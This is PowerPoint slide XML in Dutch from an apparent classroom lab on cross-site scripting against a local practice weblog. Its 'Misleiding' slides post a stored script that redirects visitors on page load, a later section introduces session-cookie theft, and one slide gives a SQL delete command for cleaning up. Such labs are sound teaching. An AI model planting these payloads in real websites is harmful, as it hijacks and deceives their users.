              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <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Stap2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voeg toe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>en bekijk het resultaat.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1569574" y="3891280"/>
            <a:ext cx="5380294" cy="2176030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8139165" y="4420071"/>
            <a:ext cx="3569627" cy="2031325"/>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Nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>zul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>taskmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> de browser moeten sluiten en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL management tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>de entry uit de database halen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>delete weblog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> naam like '.. '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305509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4.Misleiding</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Misleiding</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Stap1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Omdat de browser door het vorige, "Klieren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>enhanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>", was afgesloten, moet er nu eerst weer opnieuw een sessie worden gestart.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t>ga naar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://10.0.0.25/XSS/weblogstart.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> en vul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> in...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p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login</a:t>
            </a:r>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9" name="Afbeelding 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779382" y="3669068"/>
            <a:ext cx="3609975" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Tekstvak 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018584" y="3780188"/>
            <a:ext cx="3569627" cy="1477328"/>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Neem voor demo doeleinden even aan dat je daadwerkelijk moet inloggen en daarom de velden niet leeg laat.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221107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4.Misleiding</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Misleiding</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Stap3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Maak een de volgende entry, bv: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://10.0.0.25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weblogstart.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();"&gt;</a:t>
            </a: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Stap4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voeg toe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>en bekijk het resultaat.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1592814" y="3746784"/>
            <a:ext cx="5380294" cy="2176030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018584" y="3780188"/>
            <a:ext cx="3569627" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Bestudeer het commando nauwkeurig...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wat denk je dat er gaat gebeuren?</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393638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4.Misleiding</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Misleiding</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539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Open een tweede browser of tabblad en ga naar de site zoals eerder:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://10.0.0.25/XSS/weblogstart.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              log in met </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a: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Stap4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>en bekijk het resultaat.</a:t>
            </a:r>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9" name="Afbeelding 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5055523" y="2909719"/>
            <a:ext cx="3609975" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Tekstvak 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148996" y="5638512"/>
            <a:ext cx="3083977" cy="646331"/>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Realiseer de impact van deze mogelijkheid</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1349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5.Sessie Stelen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Sessie Stelen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954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Dit is een wat meer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> scenario. Als meerdere gebruikers op een website zitten is onderstaande de situatie.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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610133" y="3032262"/>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fbeeldingsresultaat voor office computer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677486" y="4832939"/>
            <a:ext cx="1316392" cy="13247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fbeeldingsresultaat voor web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3502" y="3891280"/>
            <a:ext cx="1003390" cy="12022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Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170066" y="3818374"/>
            <a:ext cx="2180492" cy="47515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Rechte verbindingslijn met pijl 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4170066" y="4913644"/>
            <a:ext cx="2180492" cy="383904"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3">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Tekstvak 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857811" y="3267939"/>
            <a:ext cx="2703007" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessie 1 met $_SESSION[]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naam='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>karelh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password='123'</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Tekstvak 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857810" y="2898607"/>
            <a:ext cx="2703007" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sessiecookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eh424hwde</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Tekstvak 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857812" y="5232824"/>
            <a:ext cx="2703007" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sessie 1 met $_SESSION[]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Naam='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>karelh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Password='123'</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Tekstvak 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7857811" y="4863492"/>
            <a:ext cx="2703007" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
